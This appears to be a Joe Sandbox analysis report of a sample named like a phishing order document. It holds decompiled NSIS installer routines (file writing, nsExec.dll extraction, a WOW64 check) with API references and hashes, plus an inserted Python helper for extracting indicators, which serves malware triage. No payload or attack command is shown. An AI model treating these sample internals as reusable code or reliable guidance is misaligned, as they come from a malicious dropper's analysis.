                                                0x1000250b
                                                0x10002511
                                                0x1000251d
                                                0x10002523
                                                0x10002528
                                                0x00000000
                                                0x00000000
                                                0x1000254a
                                                0x00000000
                                                0x00000000
                                                0x10002530
                                                0x10002536
                                                0x10002537
                                                0x10002539
                                                0x00000000
                                                0x00000000
                                                0x10002552
                                                0x10002554
                                                0x10002556
                                                0x10002558
                                                0x10002558
                                                0x00000000
                                                0x00000000
                                                0x100024ed
                                                0x1000255b
                                                0x1000255b
                                                0x10002560
                                                0x10002572
                                                0x10002572
                                                0x10002578
                                                0x1000257d
                                                0x10002582
                                                0x1000258e
                                                0x10002593
                                                0x00000000
                                                0x10002598
                                                0x10002584
                                                0x10002585
                                                0x10002599
                                                0x10002599
                                                0x10002582
                                                0x1000259a
                                                0x1000259e
                                                0x100025a1
                                                0x100025b8

                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                • GlobalFree.KERNEL32 ref: 10002572
                                                • GlobalFree.KERNEL32 ref: 100025AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 37%
                                                			E00402840(void* __ebx) {
                                                				void* _t26;
                                                				long _t31;
                                                				void* _t45;
                                                				void* _t49;
                                                				void* _t51;
                                                				void* _t54;
                                                				void* _t55;
                                                				void* _t56;
                                                
                                                				_t45 = __ebx;
                                                				 *((intOrPtr*)(_t56 - 0x48)) = 0xfffffd66;
                                                				_t50 = E00402BBF(0xfffffff0);
                                                				 *(_t56 - 0x38) = _t23;
                                                				if(E00405A5D(_t50) == 0) {
                                                					E00402BBF(0xffffffed);
                                                				}
                                                				E00405BE2(_t50);
                                                				_t26 = E00405C07(_t50, 0x40000000, 2);
                                                				 *(_t56 + 8) = _t26;
                                                				if(_t26 != 0xffffffff) {
                                                					_t31 =  *0x7a8a54;
                                                					 *(_t56 - 8) = _t31;
                                                					_t49 = GlobalAlloc(0x40, _t31);
                                                					if(_t49 != _t45) {
                                                						E00403235(_t45);
                                                						E0040321F(_t49,  *(_t56 - 8));
                                                						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x24));
                                                						 *(_t56 - 0x34) = _t54;
                                                						if(_t54 != _t45) {
                                                							_push( *(_t56 - 0x24));
                                                							_push(_t54);
                                                							_push(_t45);
                                                							_push( *((intOrPtr*)(_t56 - 0x28)));
                                                							E00403027();
                                                							while( *_t54 != _t45) {
                                                								_t47 =  *_t54;
                                                								_t55 = _t54 + 8;
                                                								 *(_t56 - 0x4c) =  *_t54;
                                                								E00405BC2( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                								_t54 = _t55 +  *(_t56 - 0x4c);
                                                							}
                                                							GlobalFree( *(_t56 - 0x34));
                                                						}
                                                						E00405CB9( *(_t56 + 8), _t49,  *(_t56 - 8));
                                                						GlobalFree(_t49);
                                                						_push(_t45);
                                                						_push(_t45);
                                                						_push( *(_t56 + 8));
                                                						_push(0xffffffff);
                                                						 *((intOrPtr*)(_t56 - 0x48)) = E00403027();
                                                					}
                                                					CloseHandle( *(_t56 + 8));
                                                				}
                                                				_t51 = 0xfffffff3;
                                                				if( *((intOrPtr*)(_t56 - 0x48)) < _t45) {
                                                					_t51 = 0xffffffef;
                                                					DeleteFileW( *(_t56 - 0x38));
                                                					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                				}
                                                				_push(_t51);
                                                				E00401423();
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t56 - 4));
                                                				return 0;
                                                			}


                                                0x00402840
                                                0x00402842
                                                0x0040284e
                                                0x00402851
                                                0x0040285b
                                                0x0040285f
                                                0x0040285f
                                                0x00402865
                                                0x00402872
                                                0x0040287a
                                                0x0040287d
                                                0x00402883
                                                0x00402891
                                                0x00402896
                                                0x0040289a
                                                0x0040289d
                                                0x004028a6
                                                0x004028b2
                                                0x004028b6
                                                0x004028b9
                                                0x004028bb
                                                0x004028be
                                                0x004028bf
                                                0x004028c0
                                                0x004028c3
                                                0x004028e2
                                                0x004028ca
                                                0x004028cf
                                                0x004028d7
                                                0x004028da
                                                0x004028df
                                                0x004028df
                                                0x004028e9
                                                0x004028e9
                                                0x004028f6
                                                0x004028fc
                                                0x00402902
                                                0x00402903
                                                0x00402904
                                                0x00402907
                                                0x0040290e
                                                0x0040290e
                                                0x00402914
                                                0x00402914
                                                0x0040291f
                                                0x00402920
                                                0x00402924
                                                0x00402928
                                                0x0040292e
                                                0x0040292e
                                                0x00402935
                                                0x004021dc
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                • GlobalFree.KERNEL32 ref: 004028E9
                                                • GlobalFree.KERNEL32 ref: 004028FC
                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 598869ac1d0c0d8c1f48ea91ef13a2e3ea5b07d01dc90d54694cccaa19b6dd20
                                                • Instruction ID: a3a02304b7bf1fff1c024f37f895186886f0ecb363175dbf1b7b9d1a7e5804fa
                                                • Opcode Fuzzy Hash: 598869ac1d0c0d8c1f48ea91ef13a2e3ea5b07d01dc90d54694cccaa19b6dd20
                                                • Instruction Fuzzy Hash: 3221A072800114BBDF216FA5CE49D9E7E79EF09324F24423AF550762E1CB795E41CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E00402537(int __ebx, void* __edx, intOrPtr* __esi) {
                                                				signed int _t13;
                                                				int _t16;
                                                				int _t23;
                                                				signed int _t28;
                                                				intOrPtr* _t31;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t37;
                                                				signed int _t39;
                                                
                                                				_t31 = __esi;
                                                				_t23 = __ebx;
                                                				_t13 =  *(_t34 - 0x24);
                                                				_t37 = __edx - 0x38;
                                                				 *(_t34 - 0x34) = _t13;
                                                				_t26 = 0 | _t37 == 0x00000000;
                                                				_t28 = _t37 == 0;
                                                				if(_t13 == __ebx) {
                                                					if(__edx != 0x38) {
                                                						_t16 = lstrlenW(E00402BBF(0x11)) + _t15;
                                                					} else {
                                                						E00402BBF(0x21);
                                                						WideCharToMultiByte(__ebx, __ebx, "C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp", 0xffffffff, "C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll", 0x400, __ebx, __ebx);
                                                						_t16 = lstrlenA("C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll");
                                                					}
                                                				} else {
                                                					E00402BA2(1);
                                                					 *0x40adc8 = __ax;
                                                				}
                                                				 *(_t34 + 8) = _t16;
                                                				if( *_t31 == _t23) {
                                                					L13:
                                                					 *((intOrPtr*)(_t34 - 4)) = 1;
                                                				} else {
                                                					_t33 = E00405F92(_t26, _t31);
                                                					if((_t28 |  *(_t34 - 0x34)) != 0 ||  *((intOrPtr*)(_t34 - 0x20)) == _t23 || E00405CE8(_t33, _t33) >= 0) {
                                                						_t13 = E00405CB9(_t33, "C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll",  *(_t34 + 8));
                                                						_t39 = _t13;
                                                						if(_t39 == 0) {
                                                							goto L13;
                                                						}
                                                					} else {
                                                						goto L13;
                                                					}
                                                				}
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t34 - 4));
                                                				return 0;
                                                			}


                                                0x00402537
                                                0x00402537
                                                0x00402537
                                                0x0040253c
                                                0x0040253f
                                                0x00402542
                                                0x00402547
                                                0x00402549
                                                0x00402565
                                                0x004025a3
                                                0x00402567
                                                0x00402569
                                                0x00402583
                                                0x0040258e
                                                0x0040258e
                                                0x0040254b
                                                0x0040254d
                                                0x00402552
                                                0x0040255f
                                                0x004025a8
                                                0x004025ab
                                                0x0040281e
                                                0x0040281e
                                                0x004025b1
                                                0x004025ba
                                                0x004025bc
                                                0x004025db
                                                0x004015ac
                                                0x004015ae
                                                0x00000000
                                                0x004015b4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004025bc
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
                                                • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidelstrlen
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp$C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll
                                                • API String ID: 3109718747-3613577620
                                                • Opcode ID: 0cfac67b0bc91c88d3b6eabad01ed5c174bf69e0857470ad85ca214ab4ad8ec8
                                                • Instruction ID: a78273f1e820df777bc5fa4653ad4ee3f77bb41165bb33dae94d39b2abea877a
                                                • Opcode Fuzzy Hash: 0cfac67b0bc91c88d3b6eabad01ed5c174bf69e0857470ad85ca214ab4ad8ec8
                                                • Instruction Fuzzy Hash: FC110A72A41304BEDB10AFB18F4AE9E3665AF54355F60803BF501F61C1DAFC8E51466E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 43%
                                                			E007E1096(void* __ecx) {
                                                				char _v8;
                                                				intOrPtr _t5;
                                                				intOrPtr* _t11;
                                                
                                                				_t11 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
                                                				if(_t11 == 0) {
                                                					L3:
                                                					_t5 = 0;
                                                				} else {
                                                					_push( &_v8);
                                                					_push(GetCurrentProcess());
                                                					if( *_t11() == 0) {
                                                						goto L3;
                                                					} else {
                                                						_t5 = _v8;
                                                					}
                                                				}
                                                				return _t5;
                                                			}


                                                0x007e10b2
                                                0x007e10b6
                                                0x007e10ce
                                                0x007e10ce
                                                0x007e10b8
                                                0x007e10bb
                                                0x007e10c2
                                                0x007e10c7
                                                0x00000000
                                                0x007e10c9
                                                0x007e10c9
                                                0x007e10c9
                                                0x007e10c7
                                                0x007e10d2

                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,007E113F), ref: 007E10A5
                                                • GetProcAddress.KERNEL32(00000000), ref: 007E10AC
                                                • GetCurrentProcess.KERNEL32(?,?,0000003F,?,007E113F), ref: 007E10BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.512316824.00000000007E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007E0000, based on PE: true
                                                • Associated: 00000000.00000002.512304950.00000000007E0000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512325440.00000000007E2000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512337115.00000000007E3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512347213.00000000007E4000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7e0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: AddressCurrentHandleModuleProcProcess
                                                • String ID: IsWow64Process$kernel32
                                                • API String ID: 4190356694-3789238822
                                                • Opcode ID: 4d61e886b8cba478b6acfaee1b85eaca13a8de7865d18336bd515b83af71107a
                                                • Instruction ID: d94818db875c9212678db009598b48dd7643fe17f4e219590a51fb26e05bd122
                                                • Opcode Fuzzy Hash: 4d61e886b8cba478b6acfaee1b85eaca13a8de7865d18336bd515b83af71107a
                                                • Instruction Fuzzy Hash: AEE04F71A072D4A7CA2097A29C4ED5E7BADAA0C7553400850B901D7145EABCDB01DAA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%
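The API reference entries above follow one fixed line format, and two of them carry the indicators a triage analyst wants from this report: the dropped-plugin paths under E00402537 (the nsq5B3B.tmp directory and nsExec.dll inside it) and the GetModuleHandleW/GetProcAddress pair under E007E1096, where the argument column is a stack snapshot, so the export name pushed for the following GetProcAddress already appears as GetModuleHandleW's second argument. The Python below is an added triage helper, not part of this Joe Sandbox report or of the sample's code: it parses that line format, pulls drive-letter strings out of the argument column as dropped-file indicators, and pairs each GetModuleHandle call with the GetProcAddress at the next address to recover the dynamically resolved import. The sample lines are copied from this page in the anonymised user~1 form printed in the API column; the function names and the argument classification are my own assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample input: API reference lines copied from the listings above
# (the sandbox prints the user name as user~1 in this column).
SAMPLE_API_LINES = [
    "• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894",
    "• GlobalFree.KERNEL32 ref: 004028E9",
    "• CloseHandle.KERNEL32(?), ref: 00402914",
    "• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928",
    "• WideCharToMultiByte.KERNEL32(?,?,C:\\Users\\user~1\\AppData\\Local\\Temp\\nsq5B3B.tmp,000000FF,"
    "C:\\Users\\user~1\\AppData\\Local\\Temp\\nsq5B3B.tmp\\nsExec.dll,00000400,?,?,00000021), ref: 00402583",
    "• GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,007E113F), ref: 007E10A5",
    "• GetProcAddress.KERNEL32(00000000), ref: 007E10AC",
    "• GetCurrentProcess.KERNEL32(?,?,0000003F,?,007E113F), ref: 007E10BC",
]

# "• Api.MODULE(arg,arg,...), ref: ADDR", or "• Api.MODULE ref: ADDR" when the
# sandbox captured no arguments.  Assumed format, taken from the lines above.
_LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")   # 32-bit stack slot shown as 8 hex digits
_PATH_RE = re.compile(r"^[A-Za-z]:\\")      # drive-letter path


def parse_api_line(line: str) -> Optional[Dict]:
    """Parse one entry into api, module, ref (int) and a list of (kind, value)
    arguments; kind is 'unknown' for '?', 'hex' for a raw slot, else 'str'."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    args: List[Tuple[str, str]] = []
    for a in (m.group("args") or "").split(","):
        a = a.strip()
        if not a:
            continue
        kind = "unknown" if a == "?" else "hex" if _HEX_RE.match(a) else "str"
        args.append((kind, a))
    return {"api": m.group("api"), "module": m.group("module"),
            "ref": int(m.group("ref"), 16), "args": args}


def parse_report(lines: List[str]) -> List[Dict]:
    """Parse every recognisable entry, silently skipping other report text."""
    return [r for r in map(parse_api_line, lines) if r is not None]


def extract_paths(records: List[Dict]) -> List[str]:
    """Every drive-letter path seen as a string argument, de-duplicated."""
    paths = {v for r in records for k, v in r["args"]
             if k == "str" and _PATH_RE.match(v)}
    return sorted(paths)


def find_dynamic_resolution(records: List[Dict]) -> List[Tuple[str, str, int]]:
    """Pair GetModuleHandle{A,W} with a GetProcAddress at the next higher ref.
    Because the argument column is a stack snapshot, the export name pushed for
    GetProcAddress is already the second string argument of GetModuleHandle."""
    ordered = sorted(records, key=lambda r: r["ref"])
    found: List[Tuple[str, str, int]] = []
    for cur, nxt in zip(ordered, ordered[1:]):
        if cur["api"] in ("GetModuleHandleA", "GetModuleHandleW") and nxt["api"] == "GetProcAddress":
            strings = [v for k, v in cur["args"] if k == "str"]
            if len(strings) >= 2:
                found.append((strings[0], strings[1], cur["ref"]))
    return found


def triage(lines: List[str]) -> Dict:
    """Address-ordered API sequence plus the two indicator classes."""
    records = parse_report(lines)
    ordered = sorted(records, key=lambda r: r["ref"])
    return {
        "api_sequence": [(hex(r["ref"]), r["api"]) for r in ordered],
        "paths": extract_paths(records),
        "dynamic_api": find_dynamic_resolution(records),
    }


if __name__ == "__main__":
    summary = triage(SAMPLE_API_LINES)
    for ref, api in summary["api_sequence"]:
        print(ref, api)
    print("paths:", *summary["paths"], sep="\n  ")
    print("dynamic resolution:", summary["dynamic_api"])
```

Run against the lines copied from this section it reports the two temp-directory paths and one dynamically resolved import, kernel32!IsWow64Process at 0x7e10a5. Paths are taken only from arguments classified as strings, so an 8-hex-digit slot such as 000000FF is never mistaken for an indicator; lines the regex does not recognise (the Memory Dump Source and hash entries) are ignored rather than raising.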

                                                C-Code - Quality: 97%
                                                			E100018A9(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                				void* _v8;
                                                				signed int _v12;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				char _v76;
                                                				void* _t43;
                                                				signed int _t44;
                                                				signed int _t59;
                                                				void _t63;
                                                				signed int _t64;
                                                				signed int _t65;
                                                				signed int _t67;
                                                				signed int _t68;
                                                				signed int _t70;
                                                				signed int _t71;
                                                				void* _t76;
                                                				void* _t77;
                                                				void* _t78;
                                                				void* _t79;
                                                				void* _t80;
                                                				signed int _t84;
                                                				signed int _t86;
                                                				signed int _t89;
                                                				void* _t100;
                                                
                                                				_t84 = __edx;
                                                				 *0x1000406c = _a8;
                                                				_t59 = 0;
                                                				 *0x10004070 = _a16;
                                                				_v12 = 0;
                                                				_v8 = E10001243();
                                                				_t89 = E10001311(_t41);
                                                				_t86 = _t84;
                                                				_t43 = E10001243();
                                                				_t63 =  *_t43;
                                                				_a8 = _t43;
                                                				if(_t63 != 0x7e && _t63 != 0x21) {
                                                					_a16 = E10001243();
                                                					_t59 = E10001311(_t56);
                                                					_v12 = _t84;
                                                					GlobalFree(_a16);
                                                					_t43 = _a8;
                                                				}
                                                				_t64 =  *_t43 & 0x0000ffff;
                                                				_t100 = _t64 - 0x2f;
                                                				if(_t100 > 0) {
                                                					_t65 = _t64 - 0x3c;
                                                					__eflags = _t65;
                                                					if(_t65 == 0) {
                                                						__eflags =  *((short*)(_t43 + 2)) - 0x3c;
                                                						if( *((short*)(_t43 + 2)) != 0x3c) {
                                                							__eflags = _t86 - _v12;
                                                							if(__eflags > 0) {
                                                								L54:
                                                								_t44 = 0;
                                                								__eflags = 0;
                                                								L55:
                                                								asm("cdq");
                                                								L56:
                                                								_t89 = _t44;
                                                								L57:
                                                								_t86 = _t84;
                                                								L58:
                                                								E10001470(_t84, _t89, _t86,  &_v76);
                                                								E10001272( &_v76);
                                                								GlobalFree(_v8);
                                                								return GlobalFree(_a8);
                                                							}
                                                							if(__eflags < 0) {
                                                								L47:
                                                								__eflags = 0;
                                                								L48:
                                                								_t44 = 1;
                                                								goto L55;
                                                							}
                                                							__eflags = _t89 - _t59;
                                                							if(_t89 < _t59) {
                                                								goto L47;
                                                							}
                                                							goto L54;
                                                						}
                                                						_t84 = _t86;
                                                						_t44 = E10002D90(_t89, _t59, _t84);
                                                						goto L56;
                                                					}
                                                					_t67 = _t65 - 1;
                                                					__eflags = _t67;
                                                					if(_t67 == 0) {
                                                						__eflags = _t89 - _t59;
                                                						if(_t89 != _t59) {
                                                							goto L54;
                                                						}
                                                						__eflags = _t86 - _v12;
                                                						if(_t86 != _v12) {
                                                							goto L54;
                                                						}
                                                						goto L47;
                                                					}
                                                					_t68 = _t67 - 1;
                                                					__eflags = _t68;
                                                					if(_t68 == 0) {
                                                						__eflags =  *((short*)(_t43 + 2)) - 0x3e;
                                                						if( *((short*)(_t43 + 2)) != 0x3e) {
                                                							__eflags = _t86 - _v12;
                                                							if(__eflags < 0) {
                                                								goto L54;
                                                							}
                                                							if(__eflags > 0) {
                                                								goto L47;
                                                							}
                                                							__eflags = _t89 - _t59;
                                                							if(_t89 <= _t59) {
                                                								goto L54;
                                                							}
                                                							goto L47;
                                                						}
                                                						_t84 = _t86;
                                                						_t44 = E10002DB0(_t89, _t59, _t84);
                                                						goto L56;
                                                					}
                                                					_t70 = _t68 - 0x20;
                                                					__eflags = _t70;
                                                					if(_t70 == 0) {
                                                						_t89 = _t89 ^ _t59;
                                                						_t86 = _t86 ^ _v12;
                                                						goto L58;
                                                					}
                                                					_t71 = _t70 - 0x1e;
                                                					__eflags = _t71;
                                                					if(_t71 == 0) {
                                                						__eflags =  *((short*)(_t43 + 2)) - 0x7c;
                                                						if( *((short*)(_t43 + 2)) != 0x7c) {
                                                							_t89 = _t89 | _t59;
                                                							_t86 = _t86 | _v12;
                                                							goto L58;
                                                						}
                                                						__eflags = _t89 | _t86;
                                                						if((_t89 | _t86) != 0) {
                                                							goto L47;
                                                						}
                                                						__eflags = _t59 | _v12;
                                                						if((_t59 | _v12) != 0) {
                                                							goto L47;
                                                						}
                                                						goto L54;
                                                					}
                                                					__eflags = _t71 == 0;
                                                					if(_t71 == 0) {
                                                						_t89 =  !_t89;
                                                						_t86 =  !_t86;
                                                					}
                                                					goto L58;
                                                				}
                                                				if(_t100 == 0) {
                                                					L21:
                                                					__eflags = _t59 | _v12;
                                                					if((_t59 | _v12) != 0) {
                                                						_v24 = E10002C20(_t89, _t86, _t59, _v12);
                                                						_v20 = _t84;
                                                						_t89 = E10002CD0(_t89, _t86, _t59, _v12);
                                                						_t43 = _a8;
                                                					} else {
                                                						_v24 = _v24 & 0x00000000;
                                                						_v20 = _v20 & 0x00000000;
                                                						_t84 = _t86;
                                                					}
                                                					__eflags =  *_t43 - 0x2f;
                                                					if( *_t43 != 0x2f) {
                                                						goto L57;
                                                					} else {
                                                						_t89 = _v24;
                                                						_t86 = _v20;
                                                						goto L58;
                                                					}
                                                				}
                                                				_t76 = _t64 - 0x21;
                                                				if(_t76 == 0) {
                                                					_t44 = 0;
                                                					__eflags = _t89 | _t86;
                                                					if((_t89 | _t86) != 0) {
                                                						goto L55;
                                                					}
                                                					goto L48;
                                                				}
                                                				_t77 = _t76 - 4;
                                                				if(_t77 == 0) {
                                                					goto L21;
                                                				}
                                                				_t78 = _t77 - 1;
                                                				if(_t78 == 0) {
                                                					__eflags =  *((short*)(_t43 + 2)) - 0x26;
                                                					if( *((short*)(_t43 + 2)) != 0x26) {
                                                						_t89 = _t89 & _t59;
                                                						_t86 = _t86 & _v12;
                                                						goto L58;
                                                					}
                                                					__eflags = _t89 | _t86;
                                                					if((_t89 | _t86) == 0) {
                                                						goto L54;
                                                					}
                                                					__eflags = _t59 | _v12;
                                                					if((_t59 | _v12) == 0) {
                                                						goto L54;
                                                					}
                                                					goto L47;
                                                				}
                                                				_t79 = _t78 - 4;
                                                				if(_t79 == 0) {
                                                					_t44 = E10002BE0(_t89, _t86, _t59, _v12);
                                                					goto L56;
                                                				} else {
                                                					_t80 = _t79 - 1;
                                                					if(_t80 == 0) {
                                                						_t89 = _t89 + _t59;
                                                						asm("adc edi, [ebp-0x8]");
                                                					} else {
                                                						if(_t80 == 0) {
                                                							_t89 = _t89 - _t59;
                                                							asm("sbb edi, [ebp-0x8]");
                                                						}
                                                					}
                                                					goto L58;
                                                				}
                                                			}

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: 6c55de20ad7b96facff27c14a8ebfd7daad2c96d4471c7aede05205b14c98be4
                                                • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                • Opcode Fuzzy Hash: 6c55de20ad7b96facff27c14a8ebfd7daad2c96d4471c7aede05205b14c98be4
                                                • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00401CFA() {
                                                				void* _t18;
                                                				struct HINSTANCE__* _t22;
                                                				struct HWND__* _t25;
                                                				void* _t27;
                                                
                                                				_t25 = GetDlgItem( *(_t27 - 0xc),  *(_t27 - 0x28));
                                                				GetClientRect(_t25, _t27 - 0x54);
                                                				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402BBF(_t22), _t22,  *(_t27 - 0x4c) *  *(_t27 - 0x24),  *(_t27 - 0x48) *  *(_t27 - 0x24), 0x10));
